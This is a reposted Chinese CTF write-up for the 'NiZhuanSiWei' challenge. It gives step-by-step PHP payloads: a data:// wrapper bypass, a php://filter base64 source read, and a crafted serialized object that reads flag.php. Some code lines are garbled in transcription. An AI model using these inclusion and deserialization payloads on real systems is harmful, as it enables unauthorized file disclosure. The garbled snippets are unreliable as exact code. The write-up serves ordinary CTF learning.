PHP   发布时间:2022-04-04  发布网站:大佬教程  code.js-code.com
大佬教程收集整理的这篇文章主要介绍了2019NiZhuanSiWei大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
@H_419_1@

2019]NiZhuanSiWei

  • 点:PHP伪协议、

  • 打开后是源码,拖到vscode里审计

  • 一个绕过点:

    if(isset(text,‘r’)===“welcome to the zjctf”))

  • 可以用data://写入协议

    • 2019NiZhuanSiWei

  • 所以第一个payload: ?text=data://text/plain,welcome to the zjctf

    • 2019NiZhuanSiWei

  • 接着审计,第二个绕过的地方是,这里会正则匹配flag

    if(preg_match("/flag/",$filE)){ echo “Not Now!”; exit(); }

  • 所以不能用flag.PHP,file的传参里不能有flag,else里会包含unless.PHP,用filter看一下unless.PHP

  • 第二个payload:file=PHP://filter/read=convert.base64-encode/resource=uSELEss.PHP

  • 把base64编码的文本解码查看unless.PHP内容

  • $file在这里根据提示就是flag.PHP,所以直接赋值,然后反序列化输出

  • O:4:“Flag”:1:{s:4:“file”;s:8:“flag.PHP”;}

    • 2019NiZhuanSiWei

  • 第三个payload:?text=data://text/plain,welcome to the zjctf&file=uSELEss.PHP&password=O:4:“Flag”:1:{s:4:“file”;s:8:“flag.PHP”;}

  • 然后在源码中就可以找到flag

    • 2019NiZhuanSiWei

大佬总结

以上是大佬教程为你收集整理的2019NiZhuanSiWei全部内容,希望文章能够帮你解决2019NiZhuanSiWei所遇到的程序开发问题。

如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
标签: